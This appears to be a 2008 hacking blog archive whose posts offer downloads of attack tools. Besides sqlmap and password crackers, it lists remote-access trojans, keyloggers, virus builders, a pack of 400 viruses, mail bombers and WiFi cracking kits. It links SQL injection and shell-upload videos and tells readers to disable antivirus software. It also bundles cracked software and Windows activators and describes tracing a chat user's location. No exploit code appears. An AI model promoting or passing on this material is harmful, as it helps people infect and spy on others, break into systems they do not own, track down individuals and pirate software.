Thursday, December 18, 2008

sqlmap 0.6.3 Released - Automatic SQL Injection Tool

sqlmap is an automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more..

Changes

Some of the new features include:

  • Major enhancement to get list of targets to test from Burp proxy requests log file path or WebScarab proxy ‘conversations/’ folder path with option -l;
  • Major enhancement to support Partial UNION query SQL injection technique;
  • Major enhancement to test if the web application technology sup ports stacked queries (multiple statements) by providing option –stacked-test which will be then used someday also by takeover functionality;
  • Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option –time-test;
  • Major bug fix to correctly enumerate columns on Microsoft SQL Server;
  • Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM
    there is no database name specified;
You can download sqlmap 0.6.3 here:

sqlmap-0.6.3.tar.gz (Linux)
sqlmap-0.6.3_exe.zip (Windows)

Friday, December 5, 2008

The Most Dangerous Hack Tools Ready For Download

Trojan Horses

- Yuri RAT v1.2
- MofoTro v1.7 BETA
- Charon
- Beast v2.0.7
- Omerta v1.3
- Theef v2.10
- Combined Forces R.A.T
- MoSucker v3.0
- ProRat v1.9 Fix2
More...

Keyloggers

- Elite Keylogger v1.0
- SKL v0.1
- KeySpy v2.0
- A++++
- Curiosity
- Keylogger
- KeyCopy

Binders

- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner

WebHacks/WordLists

Brute Forcers
- Munga Bunga 's Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer.tar.gz - Unix

CGI-Bug Scanners

- NStealth HTTP Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner

Viruses

- Hippi virus
- Sasser
- W32. Blaster .Worm
- Midnight Massacre
- 00001
- Nimda
- Loveletter virus
- Happy '99
- MXZ

Virus Builders

- DR VBS
- VBSwg 2 beta - Virus builder
- p0ke's WormGen 2.0
- RESIDUO - DoS Virus

MSN Hacks & Bots

- HoaX Toolbox 1.1
- MSN Extreme 3.0
- MessenPass v1.06
- Advanced Blood Scroller
- Nudge Madness
- Advanced Instant Messengers
- Contact Spy
- Msn Explosion
- Encrypted

Port & IP Scanners

- Blues Port Scanner
- ProPort v2.2
- SuperScan v3.0
- Net Scan Tools v4.2
- LanSpy v2.0
- Bitchin Threads v3.1
- Trojan Hunter v1.5
- SuperScan v4.0
- Neotrace PRO v3.25 trial&crack

Nukers And Flooders

- Rocket v1.0
- RPCNuke v1.0
- Panther Mode1 - 56k
- Panther Mode2 - ISDN +
- Final Fortune v2.4
- Battle Pong - Technophoria
- Assault v1.0
- ICMP Nuker
- CLICK v2.2

EXTRA!
- Telnet Tutorial

Download

Be Careful As There is Alot of Very Dangerous Tools in That Pack

Password = crazy-coderz.net

Metasploit Framework



Metasploit is an open-source toolkit widely used by both hackers and security admins to test for website vulnerabilities. But visitors to the site on Monday were redirected to a page announcing the site was "hacked by sunwear ! just for fun", as recorded by Sunbelt Software.

Download

The World’s Fastest MD5 Cracker - BarsWF

BarsWF is basically an MD5 cracking tool and at the moment, is currently the fastest. Right now on nVidia 9600GT/C2D 3Ghz CUDA version does 350 M keys/sec, SSE2 version does 108 M keys/sec. You may check benchmarks of all known good MD5 bruteforcers

Changes in 0.8

  • Added checks for errors when calling CUDA kernel.
  • Now you can specify custom characters for charset using -X switch.
  • You may specify minimal password length using -min_len.
  • Save/restore feature added. State is being stored to barswf.save every 5 minutes or on exit. You may continue computation using -r switch. You may manually edit .save file to distribute job on several computers (but this is up to you - it is quite simple and non-documented ). BarsWF will also write found password into barswf.save at the end.
  • Improved speed for cards GTX260, GTX280, 8800GT, 9600GSO, 8800GS, 8800GTS - by approximately 10%, all other cards will get just 1-2%.

System Requirements

  • CUDA version only:nVidia GeForce 8xxx and up, at least 256mb of video memory.
  • LATEST nVidia-driver with CUDA support.Standard drivers might be a bit older (as CUDA 2.0 is still beta)
  • CPU with SSE2 support (P4, Core2Duo, Athlon64, Sempron64, Phenom).
  • Recommended 64-bit OS (WinXP 64 or Vista64). 32-bit version is also available.

Download BarsWF 0.8 here:

CUDA:

BarsWF CUDA x64

BarsWF CUDA x32

SSE2:

BarsWF SSE x64

BarsWF SSE x32

Tuesday, December 2, 2008

Microsoft Baseline Security Analyzer - Free Windows Tool

Recently we mentioned MSAT - Microsoft Security Assessment Tool and I recalled another tool which came out originally years and years ago and I’ve personally found useful in a few situations.

It’s good when you’re working on a Domain/Group Policy and you want to lock down one machine nice and tight, it can give some pretty good pointers as to how you can secure it further.

What is MBSA?

Microsoft Baseline Security Analyzer (MBSA) is an easy-to-use tool that helps small and medium businesses determine their security state in accordance with Microsoft security recommendations and offers specific remediation guidance. Improve your security management process by using MBSA to detect common security misconfigurations and missing security updates on your computer systems. Built on the Windows Update Agent and Microsoft Update infrastructure, MBSA ensures consistency with other Microsoft management products including Microsoft Update (MU), Windows Server Update Services (WSUS), Systems Management Server (SMS), System Center Configuration Manager (SCCM) 2007, and Small Business Server (SBS).

In order to provide support for Windows Vista, Windows Server 2008, 64-bit scan tool and vulnerability assessment check support, new Windows Embedded support, and compatibility with the latest versions of the Windows Update Agent (WUA) Microsoft Baseline Security Analyzer (MBSA) 2.1 is now available.

New Features found in MBSA 2.1:

  • Support for Windows Vista and Windows Server 2008
  • Updated graphical user interface
  • Full support for 64-bit platforms and vulnerability assessment (VA) checks against 64-bit platforms and components
  • Improved support for Windows XP Embedded platform
  • Improved support for SQL Server 2005 vulnerability assessment (VA) checks
  • Automatic Microsoft Update registration and agent update (if selected) using the graphical interface or from the command-line tool using the /ia feature
  • New feature to output completed scan reports to a user-selected directory path or network share (command-line /rd feature) Windows Server Update Services 2.0 and 3.0 compatibility

You can download MBSA 2.1 here:

Download

Being Anonymous

I have just stumbled up on this software which claims to keep us anonymous and lets us browse sites banned in a country.


Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy.

Individuals use Tor to keep websites from tracking them and their family members, or to connect to news sites, instant messaging services, or the like when these are blocked by their local Internet providers. Tor's hidden services let users publish web sites and other services without needing to reveal the location of the site. Individuals also use Tor for socially sensitive communication: chat rooms and web forums for rape and abuse survivors, or people with illnesses.

Download

Proxy Switcher Pro

Different internet connections do often require completely different proxy server settings and it's a real pain to change them manually. Proxy Switcher offers full featured connection management solution. This includes flexible proxy server list management, proxy server tester and anonymous surfing capabilities.

Proxy Switcher Features:

  • Change proxy settings on the fly
  • Automatic proxy server switching for anonymous surfing
  • Works with Internet Explorer, Firefox, Opera and others.
  • Flexible proxy list management
  • Proxy Server Anonimity testing testing
  • Anonymous proxy server list download





Friday, November 28, 2008

How to find the true location of a person from chat room (Yahoo, MSN, Jabber etc

* How to find the persons IP from chat?
* How to find a person’s location from MSN, yahoo …
* This person is trying to cheat me through chat, how can I find him?
* Is it possible to find the user through chat?

Well these are haunting questions for many. People are using the anonymity of the internet to harass others over, chat, email and other source of internet tools. But keep it mind that anything and everything on the internet keep a trail behind. Some level of knowledge is needed to dig it out, that all. And with the help of modern day technologies and cyber crime detectives its easy to find a persons location over chat, email etc.

The only way to figure out the location of the person in a chat (chat room) is to get his or her IP address and track the location using some program. It’s no easier to figure out the location as the servers (Yahoo, MSN, Gtalk, Jabber chat servers) sit in-between. Many of these programs connect directly to the user IP only when a huge amount of data needs to be sent across. Something like a file transfer, cam (video) session or even a voice chat session. Once the connection is established its easy to find the IP address using any of the tools listed below.

Here are some ways to get the IP address

1. The first and the simplest is to use the ‘netstat’ command from the windows command prompt
2. Use some software like this.


http://www.rathishg.com/?pg=download

Sometimes it’s every difficult to find the exact IP address from the pool of IPs connected to the machine. Try your maximum to limit the number of inbound and out going connection from your computer while doing this. Close the browser sessions, disable antivirus updates or other software updates will reduce the number of connection made from your machine to the victims machine. Run the tool and analyze the list of IP address in that pool. Few of them will be the Yahoo, MSN or Gtalk server address and which can be easily identified with little practice. Short list the suspicious IP address and try to trace route the IP address

1. To trace route an IP address give ‘tracertIP-ADDRESS’ in command prompt

This will give you an idea of how far the victim in located. Next is to find the geographic location of the person.

Each ISP is given a particular set of IP address and the provider divides it among its users. So it’s possible to trace the location to a particular ISP or to a certain geographic location on the globe. You can use so many free tools available on the web. One thing to note here is no tool available on the planet will be able to provide the street level address information from a given IP address. But once you can pin point the IP address you can use the law enforcement officers to get the address from the ISP. The ISPs simply will not answer to your queries regarding the user location. So don’t waste time digging for it.

City level information will be suffice in most cases as we will be able to understand who the person is.

Hope it helps. Best of luck, happy hunting

Maltego - Forensics and Intelligence Application & Information Gathering Tool

Maltego is an open source intelligence and forensics application. It allows for the mining and gathering of information as well as the representation of this information in a meaningful way.

Coupled with its graphing libraries, Maltego, allows you to identify key relationships between information and identify previously unknown relationships between them. It is a must-have tool in the forensics, security and intelligence fields!

Maltego offers the user with unprecedented information. Information is leverage.

What does Maltego do?

Maltego is a program that can be used to determine the relationships and real world links between:

* People
* Groups of people (social networks)
* Companies
* Organizations
* Web sites
* Internet infrastructure such as: Domains, DNS Names, Netblocks and IP Addresses
* Phrases
* Affiliations
* Documents and files

These entities are linked using open source intelligence.

* Maltego is easy and quick to install - it uses Java, so it runs on Windows, Mac and Linux.
* Maltego provides you with a graphical interface that makes seeing these relationships instant and accurate - making it possible to see hidden connections.
* Using the graphical user interface (GUI) you can see relationships easily - even if they are three or four degrees of separation away.
* Maltego is unique because it uses a powerful, flexible framework that makes customizing possible. As such, Maltego can be adapted to your own, unique requirements.

Limitations

The Community Edition is limited in the following ways:

* A 15second nag screen
* Save and Export has been disabled
* Limited zoom levels
* Can only run transforms on a single entity at a time
* Cannot copy and paste text from detailed view
* Transforms limited to 75 per day
* Throttled client to TAS communication


DOwnload - Linux

Download - Windows

Tuesday, November 25, 2008

Vortex Admin Tools (Full Boot CD)





























Ultmate Boot CD 5.1

ERD Commander 2005

acronis Bootable Program
acronis disk director suite 9.0
acronis disk editor 6.0
acronis drive cleanser 6.0
acronis partition expert 2003
acronis recovery expert deluxe 1.0
acronis migrate easy 7.0
acronis os selector 8.0
acronis true image 8.0
acronis true image server 8.0
Hard Disk Diagnostics Tools
Data Lifeguard Tools v5.03
Fujitsu Hard Drive Diagnostic Disk
IBM/Hitachi Drive Diagnostic Disk
MAXTOR/Quantum Hard Drive-Diagnostic and Setup Disk
MAXTOR/Quantum Hard Drive-Diagnostic and Setup Disk
Samsung Hard Drive Diagnostics Disk
Samsung Hard Drive Diagnostics Disk
Seagate Hard Drive Diagnostics Disk
Western Digital Hard Drive Diagnostic Disks
HDD Diagnostics & Repair Tools
Data Advisor v5
Data Lifeguard Tools v11
DiskSpy
Hard Drive Mechanic v3.0
Hard Drive Mechanic Gold for Win9x file systems
Hard Drive Mechanic Gold for WinNT file systems
Hard Drive Mechanic Gold for Win2K and XP file systems
HDD Regenerator v1.41
HDD S.M.A.R.T. Viewer
IBM/Hitachi Drive Fitness Test
IBM/Hitachi Feature Tool
IDE/ATA Drive Diagnostics
IDESCAN 2.00
Media Test v2.53
Ontrack Disk Manager v9.50
Ontrack Disk Manager v9.57
Seagate SeaTools Desktop Edition
SpinRite 5
Hard Disk Partitioning Tools
Active@ Partition Recovery
Paragon Partition Manager 5.5
Partition Commander v8.01
Partition Resizer
PartitionStar
Partition Magic 8
PowerQuest's Partition Table Editor
Ranish Partition Manager v2.44
Smart FDisk
SPFDisk
TestDisk v5.1
XFDisk
HDD Cloning & Backup Tools
DriveStar
Ghost for Unix
Miray HDClone v1.0
Norton Ghost v7.5
Norton Ghost v8
Paragon Partition Manager 5.5
Partition Commander v8.01
Partition Saving
PC INSPECTOR's Clone Maxx
Power Quest Drive Image 2002
XCLONE
Hard Disk Boot Managers Tools
BootMagic 8 BootDisk
BootStar
Gujin
NTBoot
Smart FDisk
SPFDisk
Hard Disk Erasers
Autoclave v0.3
Darik's Boot and Nuke
DriveScrubber
KillDisk v1.1 Professional
KillDisk v2.0 Professional
KillDisk v3.0 Professional
Ontrack Data Eraser v2.00
Paragon Disk Wiper
PC INSPECTOR's e-maxx
Windows Tools, Rescue&Recovery disks
Active@ Partition Recovery
Dos Navigator Plus
]Disk Commander v1.1
Disk Commander v1.1
Easy Recovery
ERD Commander 2003 ERD C
Network Services
NTBoot
NTFS Emergency Boot Disk
NTFSCHK
NTFSDOS Pro v3.12
NTFSDOS Pro v4.00
NTFSDOS Pro v4.00
Offline
ReadNTFS
Registrar
TestDisk v5.1
Ultimate Boot Disk
Universal Boot Disk
Universal Network/CD Boot Disk
Volkov 4 and 5 plus QView
Windows 98 Startup Disk
Windows XP System setup disk
Linux Tools, Rescue Disks, Boot root
BasicLinux
BG-Rescue Linux
BlueFlops
HAL91
RIP
Tomsrtbt - Tom's Root Boot
System and Memory Diagnostics
CheckIt Pro 7
GoldMemory v5.07
Memory Doctor (DocMem)
Memtest86
Microscope PC Diagnostics v11.04u
Monitor Test
PC Diagnostics '95
PC-Check v5.02
PC-Doctor Service Center 2000
TuffTEST-Pro v3.53
Windows Memory Diagnostic
System Information,Hardware Identifiers
AIDA16
ASTRA v4.13
Microscope PC Diagnostics v11.04u
MSD.EXE v3.01
NSSI v0.57.4
PC Config 9.33
PCI Discover
PCI Sniffer
PnP BIOS
Bios Tools
CleanBoot
KillCMOS
Matthias Bockelkamp's BIOS utility
Microscope PC Diagnostics v11

Admin Tools System Requirements:

Minimal System Requirements
Keyboard and Mouse
Video adapter and monitor
CD-ROM or DVD-ROM drive
CPU: 300 MHz or higher
RAM: 128 Mb or higher
*Setup is not available

Recommended System Requirements:

Keyboard and Mouse
Video adapter and monitor
CD-ROM or DVD-ROM drive
CPU: 500 MHz Pentium III or later
RAM: 192 Mb or higher

Bonus:

UltraISO Premium Edition.9.31.Build.2633
Xp Activator
Vista Activator

Download

part-1
part-2
part-3
part-4
part-5

Sunday, November 23, 2008

ShadowScan

it's a powerfull Brute forcer for almost everything under the sun,wordlist generator, many differend scanners, pass cracker, mail spamer, mail bomber recorce hacker, file complaier and a mail list verifytor.

Download

Mirror

FTP Keylogger v2.2.

FTP Keylogger is a small application that will register every activity that occurs on your PC. With FTP Keylogger you can read their chat conversations, look at their e-mails and even watch the sites they surfed to.

FTP Keylogger allows you to register all keystrokes typed including language-specific characters, talk and messages conversations, passwords, e-mails, clipboard information, desktop and Internet activity.

Here are some key features of "FTP Keylogger":

· upload logs to an FTP
· connect to remote PC.
· Capture the client desktop.
· Real time keypress scanner.
· Remote desktop function.


Download:

2 pr0fessioanl SQL Injection Video Tut [ Uploading Shell ]

W3ll , here is 2 professional Video Tutorial About SQL Injection Attack
And Uploading Shell .

1. Into Outfile

Download


2. Phpmyadmin

Download

Have Fun Grin !

[video] Vulnerability in Yahoo.Com

see the

Vulnerability in Yahoo.Com

by the way the bug is patched !...

Download

Thursday, November 20, 2008

ShowScan ! Brute forcer for almost everything under the sun







-Brute forcer for almost everything under the sun
-Wordlist generator
-LOTS of different scanners
-Password cracks for protected files
-mail spamer
-mail bomber
-resorce hacker
-file compairer
-mail list verify

Download

Friday, November 14, 2008

Next Generation Virus Creation Kit 0.45 Beta

Next Generation Virus Creation Kit 0.45 Beta By SnakeByte



You Want To Use This Tool Disable Your AntiVirus

Download


RDM+ connects your mobile device to remote computer with Windows OS and provides the ability to perform different tasks you usually do on your desktop wirelessly behind firewall and NAT.
You can also use RDM+ Web-based service from any computer to conveniently manage your email, files, programs and network resources.

Select your device

Available Devices
Apple iPhone
BlackBerry Device
BlackBerry device
Most popular: 8700, 8100 Pearl, 8300 Curve, 8800, 9000 Bold
Windows Mobile device
Windows Mobile device
Most popular: Motorola Q, Samsung BlackJack, Samsung SCH-i760, HTC TyTN II, HTC Touch
Java Phone
Java Phone
You can access your PC from almost any currently popular mobile phone, including Symbian OS phone.
Most popular: Motorola RAZR V3, Nokia N95, Sony Ericsson P1i
Palm OS device
Palm OS device
Most popular: Palm Centro, Palm Treo, Palm TX
Web Access
Web Access
No matter what web-browser or platform (Windows, Mac, Linux, Unix) you use to access your PC remotely.


Posted from RDM official site.

Bluetooth PC Remote Control 3


Bluetooth Remote Control 3

- Control iTunes, PowerPoint, Mouse, WinAMP, Windows Media Player and much more
- See the actual desktop in your phone
- No Bluetooth setup! Just connect from your phone
- Create your own applications via Keymaps or VB and JScripts
- Supports all PC Bluetooth solutions Toshiba, Windows, BlueSoleil and Widcomm/Brodacom

Use Bluetooth Remote Control both for buisness and pleasure! Give PowerPoint presentation and see the actual slides in the phone. Change songs that are currently being played on Itunes or Media Player, browse for artists, albums, change volume and much more..

Bluetooth Remote Control is a true universal remote control. It allows the user to modify the current behaviour as well as add support for new applications. You can add support by writing Java or VB scripts, defining key maps and file actions. With key maps the user can very easy and fast define application actions and link them to any buttons on the mobile phone.

Bluetooth Remote Control is a true universal remote control. It allows the user to modify the current behaviour as well as add support for new applications. You can add support by writing Java or VB scripts, defining key maps and file actions. With key maps the user can very easy and fast define application actions and link them to any buttons on the mobile phone.



Supported phones: (1 Jan 2007) This is not a complete list! Many more devices are supported!

* Nokia Serie 60: (All phones from 2005 and later) 6680,6681,3230,6670,6260,7610 and more...
* Nokia Serie 40: (All phones from 2005 and later) 6230, 6230i and more..
* Nokia Nseries: (All phones are supported) N70, N95 and more...
* Nokia Eseries: (All phones are supported) E60, E65 and more...
* Sony Ericsson: (All phones from 2005 and later) W880i, W850i, K800i, K610i, W550, K750i, Z520, P990 and more...
* Motorola: (All phones from 2006 and later) Razer v3i and more...
* Samsung: (All phones from Q4 2006 and later) SGH-D900 and more...
* Plus additional phones from other phone manufactures

Not supported phones:
* Ericsson: T68, T68i, all T6xx, K700i, Z1010, P800
* Nokia: 6810, 6820, 3650, N-Gage, N-Gage QD
* Samsung: D500
* Motorola: V3 Razer

Download

For install:first install and double click to the registration key .The registration key is in the folder crack double click after
install the program Wink Wink Wink

Monday, November 10, 2008

Brutus - The Remote Password Cracker






















Brutus is one of the fastest, most flexible remote password crackers you can get your hands on - it's also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available although it is a possibility at some point in the future. Brutus was first made publicly available in October 1998 and since that time there have been at least 70,000 downloads and over 175,000 visitors to this page. Development continues so new releases will be available in the near future. Brutus was written originally to help me check routers etc. for default and common passwords.


Download

See the video How to work with Brutus

Get the Password list

Sunday, November 9, 2008

Hacking with Wi-fi : A section .....


ho0h !...
here you all can download some sniffing tools and software that can scan, identify, examine, detects, and crack the wi-fi zone....

use at your own responsibility, i am not responsible for any damage.

Windows Wifi Collection aircrack airsnort airopeek

The best one in all solution for hacking.
It has the best 4 toos you would ever need to sneak-peek into any wifi network. Its awesome, also you may use it at your own risk as doing ileegal stuff may lad you up in trouble.


Download

Commview for WiFi 6.0

Commview for WiFi 5.6 is the classic sniffer that checks, analyzes, detects and examines all the information that passes via each packet on WiFi networks, decoding them to be analyzed, and also verifying that the hardware of the system functions correctly.

Download


WIFI Key Generator 1.0

If your Wifi needs 40-bit keys, the best thing is to use 64-bits. If it requires 104 bits, the use one of 128. With Wifi Bit Generator you can insert a keyword of up to 63 characters (or even choose one at random), and save the key that you`ve generated in a text file.
NOTE: For WIFI Key Generator to work correctly, it needsMicrosoft .NET Frameworkinstalled on your PC.

Download



WiFi-Manager 3.1

WiFi-Manager 3.1, which lets you take control of all the profiles you have created, saving all the information (username, password, DNS, etc).Via strong security measures it stores all your access keys perfectly coded, whether it is WPA, PSK, WPA2, or WPA2-PSK.

Download





Easy WIFI Radar

Easy WIFI Radar detects and connects to wireless access points, using a rad
ar and informing you of their relative position. For each connection point found, you can analyze different information and decide which is right for your needs. To connect you just need one mouse click.

Download

Remote Desktop PassView 1.01

Remote Desktop PassView is a little tool which reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.

Using Remote Desktop PassView

Remote Desktop PassView doesn't require any installation process or additional DLL files. Just copy the executable (rdpv.exe) to any folder you like, and run it. After you run rdpv.exe, the main window display the passwords of .rdp located under your "My Documents" folder. The default .rdp file (Default.rdp) is usually stored in this location

If you want to recover that password of another .rdp file, just drag the file from Explorer into the window of Remote Desktop PassView utility or use the "Open .rdp File" option from the File menu.

Remote Desktop PassView can only recover the passwords created by your current logged on user. It cannot recover the passwords of .rdp files created by other users.

P.S: If You Want To Use This Tool Disable Your Antivirus !



Download

Saturday, November 8, 2008

BackTrack 3 Final ~ The Best LiveCD!



Hello again,


This LiveCD is a widely and common used "system" to pentest on probably all kinds of platforms, networks, etc. It contains almost everything you need, and if you need more, then there's ways to add what you need to the LiveCD.

Even without burning a new containing the tools you want on it. You can also use it as your primary Operating System, if you should desire to do so.

Official Information:

BackTrack is the most Top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes.

It's evolved from the merge of the two wide spread distributions - Whax and Auditor Security Collection. By joining forces and replacing these distributions, BackTrack has gained massive popularity and was voted in 2006 as the #1 Security Live Distribution by insecure.org. Security
professionals as well as new comers are using BackTrack as their favorite toolset all over the globe.

BackTrack has a long history and was based on many different linux distributions until it is now based on a Slackware linux distribution and the corresponding live-CD scripts by Tomas M. (Slax: your pocket operating system) . Every package, kernel configuration and script is optimized to
be used by security penetration testers. Patches and automation have been added, applied or developed to provide a neat and ready-to-go environment.

After coming into a stable development procedure during the last releases and consolidating feedbacks and addition, the team was focused to support more and newer hardware as well as provide more flexibility and modularity by restructuring the build and maintenance processes. With the current version, most applications are built as individual modules which help to speed up the maintenance releases and fixes.

Because Metasploit is one of the key tools for most analysts it is tightly integrated into BackTrack and both projects collaborate together to always provide an on-the-edge implementation of Metasploit within the BackTrack CD-Rom images or the upcoming remote-exploit.org distributed and maintained virtualization images (like VMWare images appliances).

Being superior while staying easy to use is key to a good security live cd. We took things a step further and aligned BackTrack to penetration testing methodologies and assessment frameworks (ISSAF and OSSTMM). This will help our professional users during their daily reporting nightmares.

Currently BackTrack consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals. This structure allows even newcomers to find the related tools to a certain task to be accomplished. New technologies and testing techniques are merged into BackTrack as soon as possible to keep it up-to-date.

No other commercial or freely available analysis platform offers an equivalent level of usability with automatic configuration and focus on penetration testing.

Official Download Page

Download

Gooscan - Automated Google Hacking Tool

Whilst reading an article the other day I saw this mentioned and realised I haven’t written about this yet either, although I have written about the similar tool Goolag.

What is Gooscan?

Gooscan is a tool that automates queries against Google search appliances, but with a twist. These particular queries are designed to find potential vulnerabilities on web pages. Think “cgi scanner” that never communicates directly with the target web server, since all queries are answered by a Google appliance, not by the target itself.

Who is it written for?

Security professionals: This tool serves as a front-end for an external web server assessment and aids in the “information gathering” phase of a vulnerability assessment.

Web server administrators: This tool helps to discover what the web community may already know about you thanks to Google.

Is this tool legal?

From Google ToS - “You may not send automated queries of any sort to Google’s system without express permission in advance from Google.”

This means that you should not use this tool to query Google without advance express permission. Google appliances, however, do not have these limitations. You should, however, obtain advance express permission from the owner or maintainer of the Google appliance before searching it with
any automated tool for various legal and moral reasons.
The author wrote this tool not to violate Google’s terms of service (ToS), but to raise the awareness of the web security community that a ToS may not discourage the bad guys from writing and running a tool like this for malicious purposes. To that end, only use this tool to query _appliances_ unless you are prepared to face the (as yet unquantified) wrath of Google.

Why the proxy feature?

Many companies can only reach the Internet by way of an internal proxy server. When conducting an authorized assessment, it may be necessary to bounce queries of of a web proxy instead of off the Google appliance directly.

Download

Friday, November 7, 2008

400 viruses in one file

400 viruses in one file

Avispa.dr
Dark Avenger
AVA.550
Univ/a
Auspar.377
Auspar.338
OC/oops
Middle
Auspar.635
Aus-Term.mp.3490
Jeru.1413
OC/scud
Auspar.dr
Auspar.635
Auspar.615
Auspar
Aust.543
Auspar.424
Auspar.377
Auspar.338
Auspar.292a
Auspar.215
Auspar.187
Auspar
Univ/b
Aurea.653
Iron-Maiden
Akuku.1111
Akuku.889
Akuku.886
NRLG.b
Attitude
Attention.394
HLL.ow.4505
Attention.394.dam
Xany
Univ/g
Univ/q
Univ.cmp
OC/vcl
Atomant.2143
AT
Atomic.350
Astra.1010
Suriv.dr
Comasp
Shocker.cmp.7000
Tiebud
BtDr.b
Ash.743
Univ/r
Armagedon.y
Armagedon
Vienna
ARCV.Scy.1208
ARCV.Scroll.795ARCV.Scroll.dr)
ARCV.Sand.1172
ARCV.More
ARCV.Kiss
ARCV.Jo.986
ARCV.Jo.912a
ARCV.250.dr
ARCV.642
ARCV.639a
ARCV.1183.dr
ARCV.Anna.742.dr
ARCV.639a
ARCV.Jo.916
ARCV.839
ARCV.Slime.773
ARCV.Ice
ARCV.Ice
Univ/q
ARCV.330a
ARCV.255
Crew.2480
Univ/o
7thSon.426
Arara.dr
Arara.1054
Arab.834
Armagedon.y
QScreen3
Suriv.1488
Suriv.dr
Dark Avenger.2000
Jerusalem.cr
Jerusalem.cr
APLittle.153
APLittle.150
APLittle.147
APLittle.142a
APLittle.118a
APLittle.153
Univ.topsy
Anti-Pascal
Tiny-GM.129
Jerusalem
BtDr.Unk2
Jeru.1605
AntiMIT
Antiexe
Murphy
Thanksgiving.mp.1253a
Anticad.3012a
Anticad.mp.4096.d
Anticad.2900
Anticad.mp.4096.a
Anticad.2646
Anthrax.mp.1024
Univ.ow/d
Vacsina.1206
ARCV.Anna.742.dr
HLLP.Animus
Andromeda
Jerusalem.ch
Jeru.1808.a
QZap141
Pixel.845
Pixel.k
Ambulance
AlphaStrike.2000
Alien.733.a
Alia.1023
YD.1049.a
Alex.1951
Brain
Albania
Alabama.1560.a
Akuku.886
Tiebud
BtDr.Aircop
BtDr.b
HLL.ow
HLL.cmp.8064
AHADisk
Agiplan
YDOC/vcl
Syslock.dropped
NRLG.b
V2P6.1993
Dead
BitAddict
ARCV.Scroll.795
ARCV.Scroll.dr
Acid.dr
And Many More .........

Download

Hacking with Sub7 Trojan - Video Tutorial & Download Link



Download

Thursday, November 6, 2008

Download entire website ! (offline surfing) EnJoy

Offline Downloader 4.0

As most people, you have probably experienced this problem at one time or another. The Internet Explorer or Mozilla Firefox were conceived for this purpose, to help you copy one page at a time. But if the site consists of 1000 pages, you'd have to click your mouse 1000 times and choose a directory 1000 times when you save the file. Now another option is available: using the new version of the Offline Downloader program. All you have to do is enter the address of the website without having to worry about downloading it. Then you just wait for a short time until the program copies all or part of the website you have requested.

Download

HackTeach Team Videos

Part 1:

Code:
http://hackteach.net/ht/z3ro/H-T-Team-1.rar
http://hackteach.net/ht/z3ro/H-T-Team-2_1.rar
http://hackteach.net/ht/z3ro/H-T-Team-3.rar
http://hackteach.net/ht/z3ro/H-T-Team-4.rar
http://hackteach.net/ht/z3ro/H-T-Team-5.rar
http://hackteach.net/ht/z3ro/H-T-Team-6.rar
http://hackteach.net/ht/z3ro/H-T-Team-7.rar
http://hackteach.net/ht/z3ro/H-T-Team-8.rar
http://hackteach.net/ht/z3ro/H-T-Team-9.rar
http://hackteach.net/ht/z3ro/H-T-Team-10.rar

Part 2:

Code:
http://hackteach.net/ht/z3ro/H-T-Team-11.rar
http://hackteach.net/ht/z3ro/H-T-Team-12.rar
http://hackteach.net/ht/z3ro/H-T-Team-13.rar
http://hackteach.net/ht/z3ro/H-T-Team-14.rar
http://hackteach.net/ht/z3ro/H-T-Team-15.rar
http://hackteach.net/ht/z3ro/H-T-Team-16.rar
http://hackteach.net/ht/z3ro/H-T-Team-17.rar
http://hackteach.net/ht/z3ro/H-T-Team-18.rar
http://hackteach.net/ht/z3ro/H-T-Team-19.rar
http://hackteach.net/ht/z3ro/H-T-Team-20.rar
http://hackteach.net/ht/z3ro/H-T-Team-21.rar
http://hackteach.net/ht/z3ro/hsmx-safemode1.zip
http://hackteach.net/ht/z3ro/hsmx-safemode2.rar
http://hackteach.net/ht/z3ro/hsmx-safemode3.rar
http://hackteach.net/ht/z3ro/hsmx-root.rar
http://hackteach.net/ht/z3ro/hsmx-1.rar

Wednesday, November 5, 2008

First time ever learn hacking with Video Tuts....

Video hack web site system adminpsw


http://www.larestankids.com/
Film-Download/download.asp?DownloadID=15

Video hack web site system asp-rider

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=16

Video hack web site system phpbb_sql

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=17

Hack system remote-vnc

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=20

Video hack web site system war-game-part4

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=21

Video hack web site Smart-boys

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=22

Video hack web site system Ipb2

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=23

Video hack web site system pabugs

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=25

Video hack web site system isamesih.com

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=26

Video hack web site system awstats

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=27

Video hack web site cgi

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=28

Video hack web site system phpnuke_search_module

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=29

Video hack dial-up xvpnmovie

http://www.larestankids.com/
Film-Download/download.asp?DownloadID=30

Video hack web site system easy_deface

http://www.larestankids.com/
